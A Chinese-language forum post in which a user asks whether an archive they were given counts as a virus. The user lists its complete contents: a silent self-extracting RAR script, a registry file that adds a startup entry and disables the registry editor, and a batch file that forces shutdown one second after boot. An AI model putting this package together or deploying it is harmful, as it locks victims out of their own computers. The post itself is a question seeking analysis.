chenerbox
新手上路
积分 4
发帖 4
注册 2006-8-24
|
#1 这样的算病毒吗?
今天别人给了一个"病毒"
用rar解压有两个文件
2.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
" system32"="C:\\windows\\system32\\system32.bat"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"DisableRegistryTools"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL]
"Installed"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI]
"NoChange"="1"
"Installed"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS]
还有一个system32.bat
Shutdown -s -t 1
要是直接运行rar会执行
Path=%systemroot%\system32
SavePath
Silent=1
Overwrite=1
Setup=regedit.exe /s 2.reg
Setup=system32.bat
这样的该不该算病毒呢?
我运行了,微点没有反应,虽然很容易清除,我用了影子系统,重启就没有问题了,
现在我发现病毒都喜欢把自己往sysytem文件夹放,看来我的找一个软件,能监控所有的往注册表写东西和往system写东西的软件了
| |
※ ※ ※ 本文纯属【chenerbox】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
 |
|
